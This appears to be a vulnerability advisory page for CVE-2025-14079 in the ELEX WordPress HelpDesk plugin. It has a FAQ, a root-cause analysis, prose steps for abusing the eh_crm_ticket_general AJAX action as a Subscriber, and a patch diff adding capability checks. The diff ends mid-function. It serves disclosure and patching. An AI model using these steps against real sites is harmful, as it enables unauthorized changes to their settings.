What is CVE-2025-14079?

CVE-2025-14079 is a medium-severity vulnerability in the ELEX WordPress HelpDesk & Customer Ticketing System plugin, affecting versions up to and including 3.3.5. It arises from missing authorization checks, allowing authenticated users with Subscriber-level access or higher to modify global plugin settings.

How does the vulnerability work?

The vulnerability allows attackers to exploit the `eh_crm_ticket_general` AJAX action, which lacks proper capability checks. By sending a POST request with a valid nonce, attackers can change critical settings such as default ticket assignees and labels.

Who is affected by this vulnerability?

Any WordPress site using the ELEX HelpDesk & Customer Ticketing System plugin version 3.3.5 or lower is affected. Administrators should check their plugin version in the WordPress dashboard under ‘Plugins’.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the ELEX HelpDesk plugin installed. If it is 3.3.5 or lower, your site is at risk and should be updated immediately.

What is the recommended fix for this vulnerability?

The recommended fix is to update the ELEX HelpDesk & Customer Ticketing System plugin to version 3.3.6 or later, where the missing authorization checks have been implemented to mitigate the issue.

What does a CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized changes in plugin settings, potentially affecting site operations.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability could allow unauthorized users to alter important settings, disrupting ticket management and business logic. This could lead to misrouted tickets, degraded service quality, and potential data integrity issues.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX action. This demonstrates the ease with which an attacker can modify settings without proper authorization.

What steps can I take to mitigate this vulnerability if I cannot update immediately?

If immediate updating is not possible, consider disabling the ELEX HelpDesk plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to authenticated users.

Are there any other security practices I should follow?

In addition to keeping plugins updated, regularly review user roles and permissions, implement strong passwords, and consider using security plugins to monitor for unauthorized changes and vulnerabilities.

What should I do if I suspect my site has been compromised?

If you suspect exploitation, immediately change passwords for all user accounts, review site activity logs for unauthorized changes, and consult with a security professional to assess and remediate any damage.

Where can I find more information about this vulnerability?

More information about CVE-2025-14079 can be found on the official CVE database, as well as security blogs and forums that cover WordPress vulnerabilities and best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14079: ELEX WordPress HelpDesk & Customer Ticketing System <= 3.3.5 – Missing Authorization to Authenticated (Subscriber+) Settings Update (elex-helpdesk-customer-support-ticket-system)

CVE ID CVE-2025-14079

Plugin elex-helpdesk-customer-support-ticket-system

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.3.5

Patched Version 3.3.6

Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14079:
This vulnerability is a missing authorization flaw in the ELEX WordPress HelpDesk & Customer Ticketing System plugin. It allows authenticated attackers with Subscriber-level permissions or higher to modify global plugin settings. The vulnerability affects all plugin versions up to and including 3.3.5, with a CVSS score of 5.3 (Medium severity).

The root cause is the absence of capability checks in the `eh_crm_ticket_general` function within the `class-crm-ajax-functions-one.php` file. Before the patch, the function at line 13 only verified the nonce with `wp_verify_nonce()` but performed no user authorization checks. The function processes multiple POST parameters including `default_assignee`, `default_label`, `ticket_raiser`, and `ticket_raiser_roles` to update global WSDesk settings. A shared nonce value exposed to low-privileged users enabled this authorization bypass.

Exploitation requires an authenticated attacker with at least Subscriber-level access. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `eh_crm_ticket_general`. The request must include a valid `wsdesk_nonce` value (which Subscriber users can obtain) and the settings parameters to modify. Example payload parameters include `default_assignee`, `default_label`, `ticket_raiser`, and `ticket_raiser_roles` to reconfigure global ticket handling behavior.

The patch adds capability checks to multiple AJAX handler functions across three files. In `class-crm-ajax-functions-one.php`, line 16 adds `if (! current_user_can(‘administrator’) && ! current_user_can(‘settings_page’))` before processing the `eh_crm_ticket_general` function. Similar checks appear in other functions like `eh_crm_ticket_appearance` (line 100), `eh_crm_woocommerce_settings` (line 146), and throughout the codebase. The patch also updates version numbers and adds authorization checks to reporting functions in `Reports.php`. These changes restrict sensitive operations to users with `administrator` or specific custom capability permissions.

Successful exploitation allows attackers to modify global plugin settings. This includes changing default ticket assignees, labels, ticket raiser configurations, and WooCommerce integration settings. Attackers could disrupt ticket routing, modify business logic, or degrade system functionality. While the vulnerability doesn’t directly enable privilege escalation to WordPress administrator, it allows unauthorized configuration changes that could impact service operations and data integrity.

Differential between vulnerable and patched code

Code Diff

--- a/elex-helpdesk-customer-support-ticket-system/elex-helpdesk-customer-support-ticket-system.php
+++ b/elex-helpdesk-customer-support-ticket-system/elex-helpdesk-customer-support-ticket-system.php
@@ -3,7 +3,7 @@
  * Plugin Name: ELEX HelpDesk & Customer Support Ticket System
  * Plugin URI: https://elextensions.com/plugin/wsdesk-wordpress-helpdesk-plugin-free-version/
  * Description: Enhances your customer service and enables efficient handling of customer issues.
- * Version: 3.3.5
+ * Version: 3.3.6
  * Author: ELEXtensions
  * Author URI: https://elextensions.com/
  * Text Domain: wsdesk
--- a/elex-helpdesk-customer-support-ticket-system/includes/Tickets/Reports.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/Tickets/Reports.php
@@ -28,42 +28,63 @@
 	}

 	public function avg_time_taken_to_resolve() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getAvgResolveTime( $_REQUEST );

 		Response::json( $data );
 	}

 	public function wsdesk_no_of_tickets_per_agent_per_day() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getCountByAgentsPerDay( $_REQUEST );

 		Response::json( $data );
 	}

 	public function wsdesk_no_of_replies_by_agent_per_day() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getReplyCountByAgentsPerDay( $_REQUEST );

 		Response::json( $data );
 	}

 	public function no_of_tickets_per_status() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getCountByStatus( $_REQUEST );

 		Response::json( $data );
 	}

 	public function no_of_tickets_per_tag() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getCountByTag( $_REQUEST );

 		Response::json( $data );
 	}

 	public function statisfication_score() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->satisficationScore( $_REQUEST );

 		Response::json( $data );
 	}

 	public function avg_reply_time() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$data = $this->repo->getAvgReplyTimeByAgents( $_REQUEST );

 		Response::json( $data );
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-one.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-one.php
@@ -13,6 +13,9 @@
 	public static function eh_crm_ticket_general() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$default_assignee                = isset( $_POST['default_assignee'] ) ? sanitize_text_field( $_POST['default_assignee'] ) : '';
 			$default_label                   = isset( $_POST['default_label'] ) ? sanitize_text_field( $_POST['default_label'] ) : '';
 			$ticket_raiser                   = isset( $_POST['ticket_raiser'] ) ? sanitize_text_field( $_POST['ticket_raiser'] ) : '';
@@ -94,7 +97,9 @@
 	public static function eh_crm_ticket_appearance() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$input_width                      = isset( $_POST['input_width'] ) ? sanitize_text_field( $_POST['input_width'] ) : '';
 			$main_ticket_title                = isset( $_POST['main_ticket_title'] ) ? sanitize_text_field( $_POST['main_ticket_title'] ) : '';
 			$new_ticket_title                 = isset( $_POST['new_ticket_title'] ) ? sanitize_text_field( $_POST['new_ticket_title'] ) : '';
@@ -139,6 +144,9 @@

 	public static function eh_crm_woocommerce_settings() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$woo_order_tickets = isset( $_POST['woo_order_tickets'] ) ? sanitize_text_field( $_POST['woo_order_tickets'] ) : '';
 			$woo_order_price   = isset( $_POST['woo_order_price'] ) ? sanitize_text_field( $_POST['woo_order_price'] ) : '';
 			$woo_order_access  = explode( ',', isset( $_POST['woo_order_access'] ) ? sanitize_text_field( $_POST['woo_order_access'] ) : '' );
@@ -163,7 +171,9 @@
 	public static function eh_crm_ticket_field_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$fields_remove          = isset( $_POST['fields_remove'] ) ? sanitize_text_field( $_POST['fields_remove'] ) : '';
 			$all_ticket_field_views = eh_crm_get_settingsmeta( '0', 'all_ticket_page_columns' );

@@ -207,7 +217,9 @@
 	public static function eh_crm_ticket_field_activate_deactivate() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$field_id        = isset( $_POST['field_id'] ) ? sanitize_text_field( $_POST['field_id'] ) : '';
 			$type            = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : '';
 			$selected_fields = eh_crm_get_settingsmeta( '0', 'selected_fields' );
@@ -255,7 +267,9 @@
 	public static function eh_crm_ticket_field() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$selected_fields = explode( ',', isset( $_POST['selected_fields'] ) ? sanitize_text_field( $_POST['selected_fields'] ) : '' );
 			$new_field       = json_decode( stripslashes( isset( $_POST['new_field'] ) ? sanitize_text_field( $_POST['new_field'] ) : '' ), true );
 			if ( ! empty( $new_field ) ) {
@@ -667,7 +681,9 @@
 	public static function eh_crm_ticket_field_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$field      = isset( $_POST['field'] ) ? sanitize_text_field( $_POST['field'] ) : '';
 			$args       = array(
 				'slug' => $field,
@@ -927,7 +943,9 @@
 	public static function eh_crm_ticket_label_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$label_remove = isset( $_POST['label_remove'] ) ? sanitize_text_field( $_POST['label_remove'] ) : '';
 			$args         = array( 'type' => 'label' );
 			$fields       = array( 'settings_id', 'slug' );
@@ -960,7 +978,9 @@
 	public static function eh_crm_ticket_label() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_label  = json_decode( stripslashes( isset( $_POST['new_label'] ) ? sanitize_text_field( $_POST['new_label'] ) : '' ), true );
 			$edit_label = json_decode( stripslashes( isset( $_POST['edit_label'] ) ? sanitize_text_field( $_POST['edit_label'] ) : '' ), true );
 			if ( ! empty( $new_label ) ) {
@@ -1015,7 +1035,9 @@
 	public static function eh_crm_ticket_label_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$label      = isset( $_POST['label'] ) ? sanitize_text_field( $_POST['label'] ) : '';
 			$args       = array(
 				'slug' => $label,
@@ -1051,7 +1073,9 @@
 	public static function eh_crm_ticket_tag_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$tag_remove = isset( $_POST['tag_remove'] ) ? sanitize_text_field( $_POST['tag_remove'] ) : '';
 			$args       = array( 'type' => 'tag' );
 			$fields     = array( 'settings_id', 'slug' );
@@ -1079,7 +1103,9 @@
 	public static function eh_crm_ticket_tag() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_tag  = json_decode( stripslashes( isset( $_POST['new_tag'] ) ? sanitize_text_field( $_POST['new_tag'] ) : '' ), true );
 			$edit_tag = json_decode( stripslashes( isset( $_POST['edit_tag'] ) ? sanitize_text_field( $_POST['edit_tag'] ) : '' ), true );
 			if ( ! empty( $new_tag ) ) {
@@ -1132,8 +1158,10 @@
 	public static function eh_crm_ticket_tag_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
-			$tag      = isset( $_POST['tag'] ) ? sanitize_text_field( $_POST['tag'] ) : '';
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
+			$tag        = isset( $_POST['tag'] ) ? sanitize_text_field( $_POST['tag'] ) : '';
 			$args     = array(
 				'slug' => $tag,
 				'type' => 'tag',
@@ -1187,7 +1215,9 @@
 	public static function eh_crm_ticket_view() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$selected_views = explode( ',', isset( $_POST['selected_views'] ) ? sanitize_text_field( $_POST['selected_views'] ) : '' );
 			$new_view       = json_decode( stripslashes( isset( $_POST['new_view'] ) ? sanitize_text_field( $_POST['new_view'] ) : '' ), true );
 			$edit_view      = json_decode( stripslashes( isset( $_POST['edit_view'] ) ? sanitize_text_field( $_POST['edit_view'] ) : '' ), true );
@@ -1250,7 +1280,9 @@
 	public static function eh_crm_ticket_view_activate_deactivate() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$view_id        = isset( $_POST['view_id'] ) ? sanitize_text_field( $_POST['view_id'] ) : '';
 			$type           = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : '';
 			$selected_views = eh_crm_get_settingsmeta( '0', 'selected_views' );
@@ -1285,7 +1317,9 @@
 	public static function eh_crm_ticket_view_delete() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$view_remove    = isset( $_POST['view_remove'] ) ? sanitize_text_field( $_POST['view_remove'] ) : '';
 			$args           = array( 'type' => 'view' );
 			$fields         = array( 'settings_id', 'slug' );
@@ -1311,7 +1345,9 @@
 	public static function eh_crm_ticket_view_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$view      = isset( $_POST['view'] ) ? sanitize_text_field( $_POST['view'] ) : '';
 			$view_sett = eh_crm_get_settings(
 				array(
@@ -1457,7 +1493,9 @@
 	public static function eh_crm_ticket_trigger_activate_deactivate() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$trigger_id        = isset( $_POST['trigger_id'] ) ? sanitize_text_field( $_POST['trigger_id'] ) : '';
 			$type              = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : '';
 			$selected_triggers = eh_crm_get_settingsmeta( '0', 'selected_triggers' );
@@ -1491,7 +1529,9 @@
 	public static function eh_crm_trigger() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_trigger  = isset( $_POST['new_trigger'] ) ? wp_kses_post( $_POST['new_trigger'] ) : '';
 			$new_trigger  = json_decode( stripslashes( $new_trigger ), true );
 			$edit_trigger = json_decode( stripslashes( isset( $_POST['edit_trigger'] ) ? wp_kses_post( $_POST['edit_trigger'] ) : '' ), true );
@@ -1602,6 +1642,9 @@

 	public static function eh_crm_ticket_trigger_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$trigger_remove    = isset( $_POST['trigger_remove'] ) ? sanitize_text_field( $_POST['trigger_remove'] ) : '';
 			$args              = array( 'type' => 'trigger' );
 			$fields            = array( 'settings_id', 'slug' );
@@ -1630,7 +1673,9 @@
 	public static function eh_crm_trigger_edit() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'settings_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 		$trigger      = isset( $_POST['trigger'] ) ? sanitize_text_field( $_POST['trigger'] ) : '';
 		$trigger_sett = eh_crm_get_settings(
 			array(
@@ -2272,13 +2317,10 @@

 	public static function eh_crm_agent_add_user() {

-		$current_user = wp_get_current_user();
-		$user_roles   = $current_user->roles;
-
-		if ( ! in_array( 'administrator', $user_roles, true ) && ! in_array( 'WSDesk_Agents', $user_roles, true ) && ! in_array( 'WSDesk_Supervisor', $user_roles, true ) ) {
-			wp_send_json_error( array( 'message' => 'Unauthorized User.' ), 403 );
-		}
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'agents_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}

 			$role = isset( $_POST['role'] ) ? sanitize_text_field( $_POST['role'] ) : '';
 			switch ( $role ) {
@@ -2393,14 +2435,10 @@

 	public static function eh_crm_agent_add() {

-		$current_user = wp_get_current_user();
-		$user_roles   = $current_user->roles;
-
-		if ( ! in_array( 'administrator', $user_roles, true ) && ! in_array( 'WSDesk_Agents', $user_roles, true ) && ! in_array( 'WSDesk_Supervisor', $user_roles, true ) ) {
-			wp_send_json_error( array( 'message' => 'Unauthorized User.' ), 403 );
-		}
-
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'agents_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}

 			$users  = explode( ',', isset( $_POST['users'] ) ? sanitize_text_field( $_POST['users'] ) : '' );
 			$role   = isset( $_POST['role'] ) ? sanitize_text_field( $_POST['role'] ) : '';
@@ -2480,6 +2518,9 @@
 	public static function eh_crm_edit_agent_html() {

 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'agents_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}

 			$user_id          = isset( $_POST['user_id'] ) ? sanitize_text_field( $_POST['user_id'] ) : '';
 			$user             = new WP_User( $user_id );
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-three.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-three.php
@@ -1194,6 +1194,9 @@

 	public static function eh_crm_ticket_reply_agent() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'reply_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$title      = ( isset( $_POST['ticket_title'] ) ? stripslashes( sanitize_text_field( $_POST['ticket_title'] ) ) : '' );
 			$pagination = json_decode( stripslashes( isset( $_POST['pagination_id'] ) ? sanitize_text_field( $_POST['pagination_id'] ) : null ), true );
 			$ticket_id  = isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null;
@@ -1535,6 +1538,9 @@

 	public static function eh_crm_ticket_single_ticket_action() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$ticket_id  = isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null;
 			$label      = isset( $_POST['label'] ) ? sanitize_text_field( $_POST['label'] ) : null;
 			$pagination = json_decode( stripslashes( isset( $_POST['pagination_id'] ) ? sanitize_text_field( $_POST['pagination_id'] ) : null ), true );
@@ -1547,6 +1553,9 @@

 	public static function eh_crm_ticket_single_ticket_assignee() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$ticket_id  = isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null;
 			$assignee   = isset( $_POST['assignee'] ) ? sanitize_text_field( $_POST['assignee'] ) : null;
 			$pagination = json_decode( stripslashes( isset( $_POST['pagination_id'] ) ? sanitize_text_field( $_POST['pagination_id'] ) : null ), true );
@@ -1559,6 +1568,9 @@

 	public static function eh_crm_archive_single_ticket() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			global $wpdb;
 			$filter = array(
 				'ticket_id' => array( isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null ),
@@ -1629,6 +1641,9 @@

 	public static function eh_crm_ticket_multiple_ticket_action() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			global $wpdb;

 			$repo       = new WSDeskTicketsTicketRepository();
@@ -2008,6 +2023,10 @@
 	}

 	public static function eh_crm_ticket_add_new() {
+		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 		ob_start();
 		$logged_user      = wp_get_current_user();
 		$logged_user_caps = array_keys( $logged_user->caps );
@@ -2342,10 +2361,14 @@
 					)
 				)
 			);
+		}
 	}

 	public static function eh_crm_ticket_new_submit() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$email      = isset( $_POST['email'] ) ? sanitize_text_field( $_POST['email'] ) : null;
 			$title      = isset( $_POST['title'] ) ? sanitize_text_field( $_POST['title'] ) : null;
 			$desc       = str_replace( "n", '<br/>', isset( $_POST['desc'] ) ? sanitize_text_field( $_POST['desc'] ) : null );
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-two.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-two.php
@@ -14,6 +14,9 @@
 		if (!wp_verify_nonce($nonce, 'wsdesk_nonce')) {
 			wp_send_json_error(['message' => 'Invalid nonce.'], 400);
 		}
+		if (!current_user_can('administrator') && !current_user_can('agents_page')) {
+			wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+		}
 		$current_user = wp_get_current_user();
 		$user_roles   = $current_user->roles;

@@ -90,6 +93,9 @@
 	public static function eh_crm_remove_agent()
 	{
